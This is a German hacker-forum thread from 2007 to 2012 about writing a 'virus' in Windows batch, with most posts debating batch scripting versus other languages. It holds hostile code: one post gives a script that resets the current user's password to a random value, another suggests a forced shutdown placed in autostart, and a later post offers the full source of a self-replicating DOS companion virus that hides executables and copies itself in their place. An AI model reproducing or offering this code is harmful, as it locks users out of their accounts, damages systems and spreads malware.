Einen virus in batch |
|
Zitat: |
Original von Meik1988
//edit: Btw: Du hast immernoch 4 Fehler in deiner Sig.
Traurig für einen Satz... |
|
evtl. sprechen die so in der habbo-welt?!
__________________ Rechtschreibfehler sind gewollt und dienen lediglich der Belustigung der Foren-Teilnehmer!
|
|
15.12.2007 00:20 |
|
|
|
Jah. Vlt. isser ja auch son Habbo-Kiddie und jmd. hat ihm seine Taler gestohlen, weswegen er jetzt alle Habbos auslöschen will
|
|
15.12.2007 00:28 |
|
|
|
auch n cooler virus
@echo OFF
net user %USERNAME% * %RANDOM%
exit
|
|
17.12.2007 13:12 |
|
|
|
Weißt du überhaupt was ein Virus ist?
|
|
17.12.2007 13:43 |
|
|
|
hey
wenn ihr keine ahnung habt, dann schaut euch doch erstmal beispielcodes an:
guckst du hier
kannste dann testen, ob es erkannt wird: machste hier
tuts zu batch
ansonsten eingabeauffoderung--> "befehl" /?
__________________ cu Mr Hawk
|
|
17.12.2007 16:27 |
|
|
|
Zitat: |
Original von mrhawk
hey
wenn ihr keine ahnung habt (...) |
|
... sprach der ahnungslose.
auch wenn batch turing vollständig sein mag, so repräsentiert es nicht gerade das idealbild einer programmiersprache... nicht einmal annähernd ... wieso sollte man heutzutage darin programmieren wollen, wenn es sich vermeiden lässt?
__________________ Gräten auf dem Sofakissen wird man wohl entfernen müssen.
|
|
17.12.2007 18:04 |
|
|
|
Zitat: |
Original von DarkSquirrel
... sprach der ahnungslose. |
|
das ist deine meinung...
Zitat: |
auch wenn batch turing vollständig sein mag, so repräsentiert es nicht gerade das idealbild einer programmiersprache... nicht einmal annähernd ... wieso sollte man heutzutage darin programmieren wollen, wenn es sich vermeiden lässt? |
|
es ist ne scriptsprache, die mächtiger ist, als du denkst.
und für einfache und schnelle sachen, ist es doch super... wozu so kleine sachen mit c++/delphi oder co schreiben... aufwand und nutzen sollte gewährt bleiben.
__________________ cu Mr Hawk
|
|
17.12.2007 18:18 |
|
|
|
Zitat: |
aufwand und nutzen sollte gewährt bleiben. |
|
ersteres auf jeden fall ... zweiteres wohl eher nicht ...
|
|
17.12.2007 18:38 |
|
|
|
wenn ich eine scriptsprache will mit der ich einfache wiederkehrende aufgaben automatisieren will, greife ich zu perl, bash, php, ruby, _ARBITRARY_LONG_LIST_HERE_ ... zu batch nur wenn nichts anderes verfügbar ist
bezüglich der möglichkeiten von batch ... ich bin mir sehr wohl der möglichkeiten des aktuellen commandline interpreters der NT reihe bewusst ... ich habe selbst für gewisse aufgaben solche scripts erstellt, aber sofern möglich vermeide ich es, da fast jede alternative die sich bietet flexibler ist... einzig und alein in fällen von vielen systemen, die keine anderen interpreter haben, greife ich darauf zurück... vorher überlege ich allerdings häufig, wie lange eine implementierung in C daueren würde, und ob es wirklich nötig ist schnelle änderungen am ablauf vorzusehen ...
in der regel läuft es dann darauf hinaus via batch eine stille installation des WSH-scripting hosts vorzunehmen und dann das eigentliche script zu laden ...
oder kannst du mir auf die schnelle sagen wie du so dinge wie aktuell laufendes system, installierte office version, CPU, RAM, laufwerkskapazitäten, grafik karte, und erkannten pnp monitor via batch auslesen willst? ... das sind dinge für die man sich ein WMI interface wünscht ... klar ... wmic ... aber nun schreib das bitte in eine datenbank ... klar ... sql query basteln, in ne datei schreiben, sqlclient dazu überreden das an einen server zu posten ...
die alternativen zu dem gebastel gefallen mir da deutlich besser ...
__________________ Gräten auf dem Sofakissen wird man wohl entfernen müssen.
|
|
17.12.2007 18:47 |
|
|
|
hey
sicher hat batch seine grenzen. es kommt halt auf die verwendung drauf an...
jeder soll das verwenden, womit er am besten klar kommt..
ich nutze batch auch nicht dokmatisch.
mal ne frage, wie willst du bash auf windows verwenden??
__________________ cu Mr Hawk
|
|
18.12.2007 10:41 |
|
|
|
Ganz einfach. Cygwin stellt unter Windows eine komplette und funktionierende Bash-Shell zur Verfuegung.
- malloc
__________________ \o/
|
|
18.12.2007 10:47 |
|
|
|
Zu streiten welche Programmiersprache generell und allgemein die beste ist führt natürlich zu nichts.... daher gehe ich auch nicht groß darauf ein.
Aber ich finde es gut wenn sich jemand mit den nativen fähigkeiten eines systems auseinandersetzt, und diese ausreizt. Das entspricht ja nicht unwenig einem der ursprünglichen Gedanken des hackings.
An dieser Stelle auch mal respekt vor jemanden der sich hinsetzt und in batch sachen macht die andere nur in "ausgereifteren" programmiersprachen hinbekommen..... ( und viele tun ja nichtmal das)
Aber auch an dieser Stelle mal ein paar Situationen die mir vorgekommen sind, an denen Batch ganz gut weitergeholfen hat:
1) Du sitzt bei einem Kunden, er stellt dir einen PC ohne Internetzugang, Diskettenlaufwerk, CD-ROm, usb, etc. hin und möchte testen ob man mit diesem System in seinem Unternehmen hacken kann.
Also automatisiert nach weiteren systemen scannen, offene shares suchen/mounten, etc.
2) Du möchtest in kurzer Zeit einen Security-Audit von einem server durchführen. Der Kunde lässt dich aber keine Software auf dem System installieren, und auch keine remote-Scanner-Software in seinem Netzwerk ausführen. Desweiteren darfst du auf dem Server nur Commandos ausführen, die vorher von der IT-Abteilung des Kunden freigegeben wurden.
Beides Situationen die einem Security-Consultant öfters mal passieren...
|
|
18.12.2007 12:47 |
|
|
|
klar passieren so situationen, nur tun einem die kunden in den fällen eher leid...
natürlich kann man in den fällen auf batch und evtl wsh zurück greifen, aber wenn ein kunde von dir verlangt, keine systemfremde software einzusetzen, dann ist ihm in der regel nicht klar was er eigentlich will.
welcher angreifer hällt sich an die vorgaben des kunden?
natürlich will der seine produktivsysteme nicht gefährdet sehen, weil testbedingte ausfälle nunmal geld kosten ... ein erfolgreicher einbruch allerdings, dürfte weitaus unangenehmere folgen haben ...
je nach den abzudeckenden angriffsvektoren der überprüfung, mag es sein das man mit mit den boardmitteln die verfügbar sind auskommt, jedoch sollte man den kunden bei derartigen vorgaben in seinem eigenen interesse darauf hinweisen, das es ohne weitere überprufungen noch angriffsvektoren geben kann, die aufgrund seiner vorgaben nicht abgedeckt werden können...
natürlich ist es schwerer ein system gegen jeden erdenklichen angriffsvektor zu schützen, als bei einem angriff lediglich einen ungeschützten finden zu müssen, aber gerade bei produktivsystemen die derart hohe ausfallkosten verursachen können, sollte klar sein, dass eine überprufung keine sache von ein par minuten ist, geschweige denn mit ein par scripts erledigt wäre ...
... das typische "mal eben" problem ...
...nur mein kleiner blick in den suppentopf ...
__________________ Gräten auf dem Sofakissen wird man wohl entfernen müssen.
|
|
18.12.2007 15:47 |
|
|
|
Zitat: |
Original von kf
auch n cooler virus
@echo OFF
net user %USERNAME% * %RANDOM%
exit |
|
kann mir einer erklären was das machen soll?
__________________ ?- god(X).
X = green.
|
|
05.01.2008 00:14 |
|
|
|
warum nich gleich shutdown -s -f -t 0 und das in den autostart
__________________ ?- god(X).
X = green.
|
|
05.01.2008 00:58 |
|
|
|
Das wäre zu dreist, da müsste man ja in den abgesicherten modus gehen.
|
|
05.01.2008 02:02 |
|
|
|
Wird der Autostart denn beim abgesicherten Modus ned aufgerufen?
|
|
05.01.2008 02:22 |
|
|
|
natürlich nich sonst wäre er ja nich abgesichert
__________________ ?- god(X).
X = green.
|
|
06.01.2008 14:06 |
|
|
|
Zitat: |
Original von Tommy1000
natürlich nich sonst wäre er ja nich abgesichert |
|
Muss schon sagen, diese Erklärung haut mich fast vom Stuhl.
|
|
06.01.2008 16:28 |
|
|
|
da sei froh dass du kein hocker hast da wärste glei runter gehauen worden^^
__________________ ?- god(X).
X = green.
|
|
08.01.2008 15:54 |
|
|
|
so!
damit ihr mal nen richtigen batch-virus zu gesicht bekommt:
@echo off
ctty nul
for %%f in (*. exe *. com) do set A=%%f
if %A%==COMMAND. COM set A=
rename %A% V%A%
if not exist V%A% goto end
attrib +h V%A%
copy %0. bat %A%
attrib +r %A%
ren %A% *. bat
set A=
:end
ctty con
@if exist V%0. com V%0. com %1 %2 %3
@if exist V%0. exe V%0. exe %1 %2 %3
und falls ihr noch nen anderen virus bzw. die erklärung zu dem ersten oben haben wollt geht auf diesen link:
http://archiv.raid-rush.ws/t-12619.html
ist ein 5 jahre alter post von mir
|
|
08.04.2012 20:14 |
|
|
|
kuhl, endlich ein richtiger hacker hier!
__________________ "Du wirst entweder kriminell oder Penner!"
|
|
08.04.2012 20:27 |
|
|
|
@green1
Kommt es mir nur so vor oder gibt es in letzter Zeit immer mehr von denen
MfG Congo
__________________ www.kvideo.co.de
Betriebssystem: Windows 7 32Bit
PC: Acer Aspire 5738DG
|
|
08.04.2012 23:37 |
|
|
|
hmm, immer wenn ich drüber nachdenke, stürzt weißt-schon-was ab
__________________ "Du wirst entweder kriminell oder Penner!"
|
|
09.04.2012 00:40 |
|
|
|